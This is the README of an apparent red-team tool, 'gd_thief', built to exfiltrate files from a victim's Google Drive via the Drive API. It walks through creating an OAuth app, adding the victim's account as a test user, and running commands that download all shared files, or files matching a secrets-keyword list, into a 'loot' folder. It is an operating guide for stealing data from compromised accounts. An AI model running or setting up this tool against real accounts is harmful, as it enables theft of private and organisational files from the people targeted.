Red Team tool for exfiltrating files from a target's Google Drive that you have access to, via Google's API.
Red Team tool for exfiltrating files from a target's Google Drive that you(the attacker) has access to, via the Google Drive API. This includes includes all shared files, all files from shared drives, and all files from domain drives that the target has access to.
For an illustrated walkthrough, check out my blog post.
Steps to get the Google API Access Token needed for connecting to the API
Down arrow
. A dialog listing current projects appears.New Project
. The New Project screen appears.Project Name field
, enter a descriptive name for your project.Project ID
, click Edit
. The project ID can't be
changed after the project is created, so choose an ID that meets your needs for
the lifetime of the project.Create
. The console navigates to the Dashboard page and your project is created within a few minutes.Down arrow
and select the project
you just created from the dropdown list.Menu
> APIs & Services
.Enable APIs and Services
. The "Welcome to API Library" page appears.search field
, enter "Google Drive".Enable
. The Overview page appears.Credentials
. The credential
page for your project appears.Configure Consent Screen
. The "OAuth consent screen" screen appears.External
user type for your app.Create
. A second "OAuth consent screen" screen appears.App name
fieldUser support email
field.Developer contact information
field.Save and Continue
. The "Scopes" page appears.Add or Remove Scopes
. The "Update selected scopes" page appears.Google Drive
scopes to use in the app. GD scopes cover 2 pages, so click the next page and ensure that you check them all.Update
. A list of scopes for your app appears.Save and Continue
. The "Edit app registration" page appears.Save and Continue
. The "OAuth consent screen" appears.Create Credentials
and select OAuth client ID
. The "Create OAuth
client ID" page appears.Desktop Application
.name
field, type a name for the credential. This name is only shown
in the Cloud Console.Create
. The OAuth client created screen appears. This screen shows
the Client ID
and Client secret
.OK
. The newly created credential appears under "OAuth 2.0 Client IDs."download
button to the right of the newly-created OAuth 2.0
Client ID. This copies a client secret JSON file to your desktop. Note the
location of this file.gd_thief/credentials
directory.In order to be able to run this script against the victim, you will need to add their Google account to the Test Users list for the App you just created
OAuth consent screen
. You "OAuth
Consent Screen" page appears.Test Users
click the Add Users
button.email address
field.save
button.Upon gaining access to a Target's Google account, you can run gd_thief
Google API Libraries: pip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib
usage:
python3 gd_thief.py [-h] -m [{dlAll, dlDict[-d <DICTIONARY FILE PATH>]}
[-t <THREAD COUNT>]
help:
This Module will connect to Google's API using an access token and exfiltrate files
from a target's Google Drive. It will output exfiltrated files to the ./loot directory
arguments:
-m [{dlAll, dlDict}],
--mode [{dlAll, dlDict}]
The mode of file download
Can be "dlAll", "dlDict [-d <DICTIONARY FILE PATH>]", or... (More options to come)
optional arguments:
-d <DICTIONARY FILE PATH>, --dict <DICTIONARY FILE PATH>
Path to the dictionary file. Mandatory with download mode"-m, --mode dlDict"
You can use the provided dictionary, per example: "-d ./dictionaries/secrets-keywords.txt"
-t <THREAD COUNT>, --threads <THREAD COUNT>
Number of threads. (Too many could exceeed Google's rate limit threshold)
-h, --help
show this help message and exit
Thank you to my good friend Cedric Owens for helping me with the threading piece!